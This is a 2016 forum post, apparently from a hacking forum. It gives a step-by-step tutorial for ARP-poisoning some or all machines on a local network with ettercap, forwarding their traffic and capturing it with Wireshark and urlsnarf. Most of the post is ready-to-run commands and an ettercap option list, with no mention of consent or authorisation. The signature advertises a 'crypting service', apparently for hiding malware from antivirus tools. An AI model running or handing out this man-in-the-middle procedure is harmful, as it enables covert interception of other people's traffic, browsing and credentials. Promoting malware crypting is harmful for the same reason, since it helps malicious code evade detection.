10-10-2016, 02:47 AM
Monitor Network Activity
This tutorial will demonstrate how to use ettercap, wireshark and URLsnarf to sniff and monitor network activity.
I am using Kali linux which comes with this software pre installed. Backtrack also works. If you want, you can install all the software on any other linux distro of your choice.
1) First, we need to set up our computer ready to begin monitoring. Open a new terminal, and start networking:
Code:
/etc/init.d/networking start
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Code:
cat /proc/sys/net/ipv4/ip_forward
2) Poison the network computers. Use this command to ARP poison the computers you want to monitor:
Code:
ettercap -M arp /router_ip/ /target_ip_addresses/ -p -T -q -i wlan0
Leave the target_ip_addresses blank ("//") to poison the entire network. you can use -P pluginname to use a plugin. autoadd plugin will auto add targets dynamically. We can add the code "-P autoadd" to the end of the above command.
When finished, use ctrl+c to stop the processes running and unpoison the clients ARP cache.
3) Capturing all packets using wireshark:
Open wireshark, and click start capture and select the network adapter to use. we are using wlan0.
All packets will start being displayed on your screen. You can use various filters to limit the packets you want to see. The default colour scheme is slightly terrible, so you can change it using "Coloring Rules..." in the view menu.
4) Monitoring visited URLs on the network with URLSnarf:
A great program to use if you just want to view URLs visited is URLSnarf. Open a second terminal, and use this command to display the URLS:
Code:
urlsnarf -i wlan0
Code:
urlsnarf -i wlan0 |cut -d\" -f4
LIST OF ETTERCAP COMMAND LINE ARGUMENTS:
Sniffing and Attack options:
-M, --mitm <METHOD:ARGS> perform a mitm attack
-o, --only-mitm don't sniff, only perform the mitm attack
-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-u, --unoffensive do not forward packets
-r, --read <file> read data from pcapfile <file>
-f, --pcapfilter <string> set the pcap filter <string>
-R, --reversed use reversed TARGET matching
-t, --proto <proto> sniff only this proto (default is all)
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
-s, --script <CMD> issue these commands to the GUI
-C, --curses use curses GUI
-G, --gtk use GTK+ GUI
-D, --daemon daemonize ettercap (no GUI)
Logging options:
-w, --write <file> write sniffed data to pcapfile <file>
-L, --log <logfile> log all the traffic to this <logfile>
-l, --log-info <logfile> log only passive infos to this <logfile>
-m, --log-msg <logfile> log all the messages to this <logfile>
-c, --compress use gzip compression on log files
Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual <format> set the visualization format
-e, --regex <regex> visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password
General options:
-i, --iface <iface> use this network interface
-I, --iflist show all the network interfaces
-n, --netmask <netmask> force this <netmask> on iface
-P, --plugin <plugin> launch this <plugin>
-F, --filter <file> load the filter <file> (content filter)
-z, --silent do not perform the initial ARP scan
-j, --load-hosts <file> load the hosts list from <file>
-k, --save-hosts <file> save the hosts list to <file>
-W, --wep-key <wkey> use this wep key to decrypt wifi packets
-a, --config <config> use the alterative config file <config>
Standard options:
-U, --update updates the databases from ettercap website
-v, --version prints the version and exit
-h, --help this help screen
Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful.
Check Out My Free Crypting Service Here